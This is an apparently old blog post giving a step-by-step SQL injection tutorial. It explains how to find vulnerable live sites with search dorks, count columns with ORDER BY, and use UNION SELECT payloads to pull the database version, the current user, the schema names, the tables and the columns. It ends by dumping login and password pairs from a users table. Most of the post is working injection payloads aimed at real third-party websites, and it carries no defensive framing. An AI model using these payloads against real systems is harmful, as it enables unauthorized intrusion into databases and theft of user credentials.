border: 1px solid #d2d2d2; padding: 0px 8px 0px 8px; color: #a19999; font-size: 12px; height: 25px; width: 165px; border-radius: 5px; -moz-border-radius: 5px; -webkit-border-radius: 5px; margin:0px; } .submitbutton{ background:#F66303; border: 1px solid #F66303; text-shadow: 1px 1px 1px #333; box-shadow: 3px 3px 3px #666; font:bold 12px Arial, sans-serif; color: #fff; height: 25px; padding: 0 12px 0 12px; margin: 0 0 0 5px; border-radius: 5px; -moz-border-radius: 5px; -webkit-border-radius: 5px; cursor:pointer;}

Receive all updates via Facebook. Just Click the Like Button Below

You can also receive Free Email Updates:

Powered By Blogger Widgets

Related Posts Plugin for WordPress, Blogger...

Sunday, April 24, 2011

SQL injection Tutorial

SQL injection Tutorial

  1. Finding vulnerable sites
  2. Finding amount of columns
  3. Getting mysql version current user
  4. Getting Databases
  5. Getting Tables
  6. Getting Columns
  7. Getting Usernames and Passwords

1. Finding vulnerable sites

To find Vulnerable sites you are going to use Google Dorks.
Some common dorks are:


You can read my tutorial on how to use SQL injection scanner called "SQL Poizon":

lets say you got this site:
if we add a ' before or after the numbers it should look something like this if its vulnerable:

[Image: sqlitut1.jpg]

2. Finding amount of columns

To find the right amound of columns we are using "order by". here is how it works:

Code: order by 1-- (page loads normal) order by 2-- (page loads normal) order by 3-- (page loads normal) order by 4-- (page loads normal) order by 5-- (page loads normal) order by 6-- (page loads normal) order by 7-- (page loads normal) order by 8-- (page loads normal) order by 9-- (error)

This means or site has 8 columns and we will now move over to "union select".

This is how it works:
Code: union select 1,2,3,4,5,6,7,8--

Note the hyphen - before the numbers!

This should make the website to show some numbers on the screen like this:

[Image: sqlitut2.jpg]

This meens its absolutly sure that the site is vulnerable to sql injection.

3. Getting MySQL version and Current User

Now we wanna know the MySQL version. If its over 5 then its injectable by this Tut. (if its under 4 then you have to guess tables and columns).

Code: union select 1,2,@@version,4,5,6,7,8--

[Image: sqlitut3.jpg]

To get the Current user you type this:

Code: union select 1,2,user(),4,5,6,7,8--

This should display:

[Image: sqlitut4.jpg]

4. Getting Databases

Now we wanna find the databases and the Current database.
Here the syntax for all databases:

Code:,2,group_concat(schema_name),4,5,6,7,8 from+information_schema.schemata--

It should displays something like this:

[Image: sqlitut5.jpg]

Now wel would like to now what is the current database, it's pretty obvious in this case but usefull sometimes.

Syntax for current database:


This should display something like this:

[Image: sqlitut6.jpg]

5. Getting Tables

Now we want to know the tables on in the database and for this we will conintue using "union select".

Here is the code:
Code:,2,group_concat(table_name),4,5,6,7,8 from information_schema.tables where table_schema=database()--

This should display something like this:

[Image: sqlitut7.jpg]

We now know that the table that passwords should be stored in are called bpusers, write it down and move on.

6. Getting Columns

Now we want to know the columns.

Here is the code:
Code:,2,group_concat(column_name),4,5,6,7,8 from information_schema.columns where table_schema=database()--

This should display something like this:

[Image: sqlitut8.jpg]

7. Dumping users/pass

Now you would like to dump logins and passwords from bpusers.

Here is the code for thath:
Code:,2,group_concat(login,0x3a,password,0x3a),4,5,6,7,8 from bpusers--

This would display something like this:

[Image: sqlitut9.jpg]

(NOTE: 0x3a will make a : between logins and passwords.)

You have now performed a SQL injection attack

No comments:

Post a Comment


Twitter Delicious Facebook Digg Stumbleupon Favorites More